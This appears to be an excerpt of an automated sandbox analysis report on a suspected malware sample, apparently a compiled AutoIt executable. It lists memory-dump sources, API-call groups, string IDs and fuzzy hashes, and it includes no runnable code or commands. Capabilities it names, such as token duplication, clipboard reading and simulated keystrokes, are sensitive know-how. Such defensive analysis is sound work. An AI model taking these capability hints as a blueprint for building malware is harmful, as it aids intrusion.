                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                      • Instruction ID: 65f42054d59cf95790c7e2197e3c6865e435221b13810e1741a9b9f903793f09
                                                                      • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                      • Instruction Fuzzy Hash: BA228D36A0CA418AEB50FF29E84656977A0FB88B94F104235DE4ED7B65EF3CD445DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 1993697042-4164748364
                                                                      • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                      • Instruction ID: 284ba9b246e4fc26fdca9fa7f8ef6228a5f50463f3c699cb769c432faa60f449
                                                                      • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                      • Instruction Fuzzy Hash: EF528133A0CA4292FB54BF65D4866B96760FB84B84F504135DB5EE3AA6EF3CE490D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3481653762-0
                                                                      • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                      • Instruction ID: 811c40a5c42c6b2e324821d173fbb009f15ea4be1caedd2c562da038cd828c17
                                                                      • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                      • Instruction Fuzzy Hash: BF329036A0CA8186EB50FF25D4466B977A0FB85B84F540135DA4EE3B99DF3CE445EB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-2439800395
                                                                      • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                      • Instruction ID: 2f163f74ae3f0ac54bf26e4cbd7985765746c053421cc67cb39ac7dd4eee4c15
                                                                      • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                      • Instruction Fuzzy Hash: E1E1A176A0CA8186E750FF25E84266A7BA0FB88B94F500135DB4EE7B65DF7CE045DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 3778422247-2988720461
                                                                      • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                      • Instruction ID: 584376e39e3efb91dc827ab2b134e42fd327ba1ed66c69f2b05354807c265bfd
                                                                      • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                      • Instruction Fuzzy Hash: FB418721F0C91243F7947B26A81763E2291BFC8B91F549035C90EE7B56FF3D984A9B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                      • String ID:
                                                                      • API String ID: 3372153169-0
                                                                      • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                      • Instruction ID: 74cc207d7ca9603ad3046982f93e831d6e7088d0a89da9bd078ad5ec45e1513d
                                                                      • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                      • Instruction Fuzzy Hash: E022D072A0DA4285FB60BB25D4922BD3761FF41B94F505136CA2EE7696EF3CE850E340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                      • String ID: default$winsta0$winsta0\default
                                                                      • API String ID: 3202303201-1423368268
                                                                      • Opcode ID: 484970ac736dff589331ed422b9bf64a60db06827880bd9628e4d22fac1a6010
                                                                      • Instruction ID: 2916d2496a9012c9a53dff65733ca7b8cc1358aafab6a26315597fe08b3fb2ca
                                                                      • Opcode Fuzzy Hash: 484970ac736dff589331ed422b9bf64a60db06827880bd9628e4d22fac1a6010
                                                                      • Instruction Fuzzy Hash: 4FA14A32A1CB4286E714FF61E4422AA63A1FB85B94F444135DE5DE7B9AEF3CE005DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                      • Instruction ID: 6d1514589a23c2cf68970a071c73c39f2be11e907312e750012272223deccc4b
                                                                      • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                      • Instruction Fuzzy Hash: 2AD17E32A08A528AEB54FF38D8566AD37A1FB44758F100535DA0EE36A9EF3CE444D740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2880407647-0
                                                                      • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                      • Instruction ID: fd62bd62a3d9e7cae168d81bf04aa5fa384c12d8f1f1f3d529fc00a9d63da7cf
                                                                      • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                      • Instruction Fuzzy Hash: 7D03D673A0C1C28BDB75AE25D441AF937A5FB9478DF000135DA1AE7B5AEF38A944DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                      • String ID:
                                                                      • API String ID: 3222323430-0
                                                                      • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                      • Instruction ID: 0078016684d30bc4b600eb5a81b585db60efb18fe0398d8eac3e5977b187276b
                                                                      • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                      • Instruction Fuzzy Hash: 74717922A0CA4392EA50FB15D5572BC2360BF84B85F414435D94EE77A7FF3CEA0AA700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                      • String ID:
                                                                      • API String ID: 1015379403-0
                                                                      • Opcode ID: a83fe4f5306eaf910e601f6e59f95a622c8acce945ecabde211c6dc0a3ab86c0
                                                                      • Instruction ID: b9453a46cfb347816cfe5f0e8a46952148e5075dc3eda34763a6d9e4d3fee3bd
                                                                      • Opcode Fuzzy Hash: a83fe4f5306eaf910e601f6e59f95a622c8acce945ecabde211c6dc0a3ab86c0
                                                                      • Instruction Fuzzy Hash: D702F772A0C68285FB60BF60D4062B92B61FB44794F544231DA5EE7BD6EF3CE546EB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 281475176-2761157908
                                                                      • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                      • Instruction ID: fd5a9478042660edb546189c33a9ba8e4b37c75539184cbd6f6cdc5e56e9a0ef
                                                                      • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                      • Instruction Fuzzy Hash: 69B20872A0D1828BE765BE25D4416FD37A1FB94388F506135DA0AE7B86EF38E504DF80
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValue$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3314541760-966354055
                                                                      • Opcode ID: d1c3fb05885c6ae957028d5896b9f6ede8b5dad306b55e9541d4045d09225245
                                                                      • Instruction ID: 540045ead9eb28b7c4b0bceff9d6f7be62e3af261dfb7c5a24151fbf2fe9b96a
                                                                      • Opcode Fuzzy Hash: d1c3fb05885c6ae957028d5896b9f6ede8b5dad306b55e9541d4045d09225245
                                                                      • Instruction Fuzzy Hash: DB026E62B0CA4285EB10FF26D4922AD7760FB88B88B058432DE1DE7797EF38E545D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                      • String ID: -$:$:$?
                                                                      • API String ID: 3440502458-92861585
                                                                      • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                      • Instruction ID: f7d6f53b15b46f17e6d9a253923c96559087e1cc3cb78ca84c52f5cdf2164a02
                                                                      • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                      • Instruction Fuzzy Hash: 6AE1E832A0D28286F768BF3598535B937A0FF44784F446135EA9DE3A96EF3CE441A740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3232708057-3289030164
                                                                      • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                      • Instruction ID: e40c75fa3d8fa75eb850f7201beb5fa0bf1db36998ccd6ad2e3591cd70ea2318
                                                                      • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                      • Instruction Fuzzy Hash: 06D18262B1CA5285EB10FB65E4420FE6761FB84794F404131EA5DE7AAAFF7CD508DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1111067124-438819550
                                                                      • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                      • Instruction ID: d2a3501ed663198816377af9c206cacce7eb60486276e811ebcb52820fb7ca4a
                                                                      • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                      • Instruction Fuzzy Hash: 7E719E32A1CB8691DB10FF12D8821EA6761FB84B88F445031EA4ED7BA7EF39E545D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                      • Instruction ID: e1fb29a7c5ac781302831c8ce2d8614688d9eabb7364b1fab3d701887b6b6f77
                                                                      • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                      • Instruction Fuzzy Hash: 5741A521A0C64296EB40FB15E846279A3A1FB44BB4F844231ED6EE76D6FF3CD409E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: SendString
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 890592661-1007645807
                                                                      • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction ID: 1bf57a58d2f4d7c07a78e897ef31d2cfcb4e997a669cddee7660706c48ea92be
                                                                      • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction Fuzzy Hash: C9217122A0C95291E720FB24E8966BA6725FF94748FC44031E54DE799EFF3CD909D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction ID: 428753a20e15e5a7e1ec5f18783eb4c95222b312bdcf4f02cfba6b5ade7be803
                                                                      • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
